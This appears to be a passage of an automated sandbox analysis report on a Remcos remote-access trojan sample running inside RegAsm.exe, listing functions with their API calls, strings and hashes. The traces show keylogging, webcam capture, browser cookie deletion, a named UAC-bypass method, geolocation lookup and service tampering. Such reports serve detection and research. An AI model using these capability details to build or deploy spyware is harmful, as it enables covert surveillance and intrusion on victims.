String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
CloseHandle.KERNEL32(00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000), ref: 0041C477

Strings

hpF, xrefs: 0041C3F2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: hpF
API String ID: 1852769593-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Uniqueness

Uniqueness Score: -1.00%

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Uniqueness

Uniqueness Score: -1.00%

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Uniqueness

Uniqueness Score: -1.00%

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] before ShellExec, xrefs: 004075F1
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004075B0, 004075B3, 00407605
[+] ShellExec success, xrefs: 0040760E
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-2216821008
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

UserProfile, xrefs: 0040BAAD
[Chrome Cookies not found], xrefs: 0040BB01
[Chrome Cookies found, cleared!], xrefs: 0040BB0D
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0041CDA4
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

CONOUT$, xrefs: 0041CDD0
4.9.4 Pro, xrefs: 0041CE0B
Remcos v, xrefs: 0041CDFD

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$4.9.4 Pro$CONOUT$
API String ID: 2425139147-3065609815
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Uniqueness

Uniqueness Score: -1.00%

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040D262), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

OpenCamera, xrefs: 00404582
GetFrame, xrefs: 0040459F
HNG, xrefs: 004045E6
CloseCamera, xrefs: 0040458E
FreeFrame, xrefs: 004045B0

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Uniqueness

Uniqueness Score: -1.00%

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B
], xrefs: 0040B180
Offline Keylogger Started, xrefs: 0040B16B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: f85353ea35951a508e89b73e02c956c0dbd1043fc52e466a72c0f1ad9f8d21bb
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: f85353ea35951a508e89b73e02c956c0dbd1043fc52e466a72c0f1ad9f8d21bb
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32 ref: 0041D55B
CreateWindowExA.USER32 ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

MsgWindowClass, xrefs: 0041D526
0, xrefs: 0041D52B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

